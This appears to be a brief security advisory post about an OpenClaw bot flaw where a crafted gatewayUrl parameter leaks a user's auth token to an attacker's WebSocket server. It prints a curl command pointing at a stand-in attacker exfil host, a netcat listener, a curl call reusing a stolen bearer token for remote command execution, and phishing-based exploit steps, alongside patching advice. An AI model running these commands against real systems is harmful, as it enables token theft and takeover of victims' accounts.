Listen to this Post
The vulnerability exists in the OpenClaw bot’s handling of the `gatewayUrl` parameter. When the application processes a crafted URL containing a `gatewayUrl` query parameter, it automatically and silently initiates a WebSocket connection to the attacker-controlled server specified in that parameter. During this connection, the application erroneously transmits the user’s sensitive authentication token to the malicious server. An attacker can exploit this by tricking a user into visiting a specially crafted link. Upon visitation, the token is exfiltrated to the attacker’s server. This stolen token can then be used to authenticate to the application as the victim, potentially leading to full Remote Code Execution (RCE) within the context of the bot’s permissions and capabilities, as the token grants full API access.
Platform: OpenClaw (clawdbot)
Version: < 2026.1.29
Vulnerability: Authentication Token Exfiltration
Severity: Critical
Date: 2026-02-01
Prediction: 2026-02-02
What Undercode Say:
curl -s "http://target/vuln-page?gatewayUrl=wss://attacker-server.com/exfil" nc -lvnp 443 Logs containing exfiltrated token
Attacker uses stolen token
curl -H "Authorization: Bearer <STOLEN_TOKEN>" https://target/api/admin/exec -X POST -d '{"command":"id"}'
How Exploit:
1. Attacker sets up a WebSocket server.
- Crafts a malicious URL with `gatewayUrl` pointing to their server.
3. Victim visits the URL (via phishing, etc.).
- OpenClaw automatically connects and sends the auth token.
- Attacker captures token and uses it for authenticated RCE.
Protection from this CVE:
Update to version 2026.1.29.
Validate and sanitize all URL parameters.
Implement user consent for connections.
Use secure token storage.
Impact:
Full system compromise.
Unauthorized bot control.
Data breach and theft.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

